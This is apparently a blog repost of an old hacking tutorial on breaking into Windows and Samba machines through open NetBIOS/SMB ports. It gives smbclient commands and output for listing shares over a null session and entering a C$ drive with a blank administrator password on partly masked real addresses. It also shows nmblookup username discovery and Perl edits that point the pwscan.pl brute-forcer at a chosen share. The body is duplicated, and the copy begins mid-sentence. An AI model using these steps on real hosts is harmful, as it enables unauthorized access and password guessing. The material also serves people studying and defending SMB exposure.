SMB is used by Windows machines (and with SAMBA even Unix machines) to
communicate. A lot can be done through an open Net BIOS port. The first thing
is to try to find out what shares are advertised on the server. Some servers
is not configured well and will revealing its shares without a username or
password (using a NULL connection).
>smbclient -L 209.xxx.68.66 -n "just a test"
Password: <cr>
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 2.0.3]
Share name Type Comment
--------- ---- -------
winshares Disk FreeBSD Samba Server
IPC$ IPC IPC Service (Samba 2.0.3)
Server Comment
--------- -------
FILES Samba 2.0.3
Workgroup Master
--------- -------
WORKGROUP FILES
(Note the -nswitch - we don't want to call the server with our server name,
just in case you are running SAMBA yourself) As you can see we find some
lovely information on the server - the workgroup/domain name, the
description and the Windows version (above server was a SAMBA server
actually). Nice...Of course with a known password, or a blank password
things are much more fun- you can list all the shares or you might want to
access a drive:
> smbclient \\\\208.xxx.198.71\\c$ -U administrator -n "justatest"
Password: <blank..duh!>
Domain=[xxx] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \> ls
WINNT D 0 Fri Oct 8 23:24:02 1999
NTDETECT.COM AHSR 26816 Fri Aug 11 01:22:24 2000
ntldr AHSR 156496 Fri Aug 11 01:22:24 2000
boot.ini ASR 288 Sat Oct 9 00:30:56 1999
ffastun.ffo AH 208896 Fri Dec 29 00:35:34 2000
Program Files D 0 Fri Oct 8 23:28:10 1999
CONFIG.SYS A 0 Fri Oct 8 23:31:46 1999
AUTOEXEC.BAT A 0 Fri Oct 8 23:31:46 1999
IO.SYS AHSR 0 Fri Oct 8 23:31:46 1999
MSDOS.SYS AHSR 0 Fri Oct 8 23:31:46 1999
TEMP D 0 Fri Oct 8 23:31:50 1999
--cut--
You are now dropped into the smbclient"shell". From here you could do file
transfers and the likes (see Chapter 6 - what now). You should really be
able to figure out how "smbclient" works on your own...
You might also want to try to collect information with the "nmblookup"
command - it helps sometimes to find the administrator username (if it was
changed):
# nmblookup -A 160.124.19.99
Looking up status of 160.124.19.99
received 10 names
HUTSI <00> - B <ACTIVE>
SENSEPOST <00> - <GROUP> B <ACTIVE>
HUTSI <20> - B <ACTIVE>
HUTSI <03> - B <ACTIVE>
SENSEPOST <1e> - <GROUP> B <ACTIVE>
SENSEPOST <1d> - B <ACTIVE>
INet~Services <1c> - <GROUP> B <ACTIVE>
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>
IS~HUTSI <00> - B <ACTIVE>
BAAS <03> - B <ACTIVE>
Look at the entries marked <03>. Note "BAAS". "Baas" is the renamed
administrator username. So, forget trying using "administrator" as a
username.
You also want to have a look at VLAD(yet again). The pwscan.plscript does
a good job of brute forcing NetBIOS (run it with switches -vand -B). The
pwscan.plscript actually uses the "smbclient" command and inspects the
output to find a valid username & password combination. If you want to brute
a specific share, you will need to modify these lines (starting at line 610
in version 1.17):
$cmd = "smbclient";
$service = "//".$target."/ipc\$";
@args = ($service, "'".$pass."'",
"-U", $user);
$s = Expect->spawn($cmd, @args);
to read something like
$cmd = "smbclient";
$service = "//".$target."/sharename";
@args = ($service, "'".$pass."'",
"-U", $user);
$s = Expect->spawn($cmd, @args);
An excellent paper on NetBIOS and the CIFS protocol by Hobbit can be found
at http://packetstorm.securify.com/docs/infosec/cifs.txt. You really should
try to read it.
Added: you should reallylook at a tool called CIS by David Litchfield
(nowadays with @stake) It does a lot of cool stuff – and it does wonders for
SMB.
communicate. A lot can be done through an open Net BIOS port. The first thing
is to try to find out what shares are advertised on the server. Some servers
is not configured well and will revealing its shares without a username or
password (using a NULL connection).
>smbclient -L 209.xxx.68.66 -n "just a test"
Password: <cr>
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 2.0.3]
Share name Type Comment
--------- ---- -------
winshares Disk FreeBSD Samba Server
IPC$ IPC IPC Service (Samba 2.0.3)
Server Comment
--------- -------
FILES Samba 2.0.3
Workgroup Master
--------- -------
WORKGROUP FILES
(Note the -nswitch - we don't want to call the server with our server name,
just in case you are running SAMBA yourself) As you can see we find some
lovely information on the server - the workgroup/domain name, the
description and the Windows version (above server was a SAMBA server
actually). Nice...Of course with a known password, or a blank password
things are much more fun- you can list all the shares or you might want to
access a drive:
> smbclient \\\\208.xxx.198.71\\c$ -U administrator -n "justatest"
Password: <blank..duh!>
Domain=[xxx] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \> ls
WINNT D 0 Fri Oct 8 23:24:02 1999
NTDETECT.COM AHSR 26816 Fri Aug 11 01:22:24 2000
ntldr AHSR 156496 Fri Aug 11 01:22:24 2000
boot.ini ASR 288 Sat Oct 9 00:30:56 1999
ffastun.ffo AH 208896 Fri Dec 29 00:35:34 2000
Program Files D 0 Fri Oct 8 23:28:10 1999
CONFIG.SYS A 0 Fri Oct 8 23:31:46 1999
AUTOEXEC.BAT A 0 Fri Oct 8 23:31:46 1999
IO.SYS AHSR 0 Fri Oct 8 23:31:46 1999
MSDOS.SYS AHSR 0 Fri Oct 8 23:31:46 1999
TEMP D 0 Fri Oct 8 23:31:50 1999
--cut--
You are now dropped into the smbclient"shell". From here you could do file
transfers and the likes (see Chapter 6 - what now). You should really be
able to figure out how "smbclient" works on your own...
You might also want to try to collect information with the "nmblookup"
command - it helps sometimes to find the administrator username (if it was
changed):
# nmblookup -A 160.124.19.99
Looking up status of 160.124.19.99
received 10 names
HUTSI <00> - B <ACTIVE>
SENSEPOST <00> - <GROUP> B <ACTIVE>
HUTSI <20> - B <ACTIVE>
HUTSI <03> - B <ACTIVE>
SENSEPOST <1e> - <GROUP> B <ACTIVE>
SENSEPOST <1d> - B <ACTIVE>
INet~Services <1c> - <GROUP> B <ACTIVE>
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>
IS~HUTSI <00> - B <ACTIVE>
BAAS <03> - B <ACTIVE>
Look at the entries marked <03>. Note "BAAS". "Baas" is the renamed
administrator username. So, forget trying using "administrator" as a
username.
You also want to have a look at VLAD(yet again). The pwscan.plscript does
a good job of brute forcing NetBIOS (run it with switches -vand -B). The
pwscan.plscript actually uses the "smbclient" command and inspects the
output to find a valid username & password combination. If you want to brute
a specific share, you will need to modify these lines (starting at line 610
in version 1.17):
$cmd = "smbclient";
$service = "//".$target."/ipc\$";
@args = ($service, "'".$pass."'",
"-U", $user);
$s = Expect->spawn($cmd, @args);
to read something like
$cmd = "smbclient";
$service = "//".$target."/sharename";
@args = ($service, "'".$pass."'",
"-U", $user);
$s = Expect->spawn($cmd, @args);
An excellent paper on NetBIOS and the CIFS protocol by Hobbit can be found
at http://packetstorm.securify.com/docs/infosec/cifs.txt. You really should
try to read it.
Added: you should reallylook at a tool called CIS by David Litchfield
(nowadays with @stake) It does a lot of cool stuff – and it does wonders for
SMB.
No comments:
Post a Comment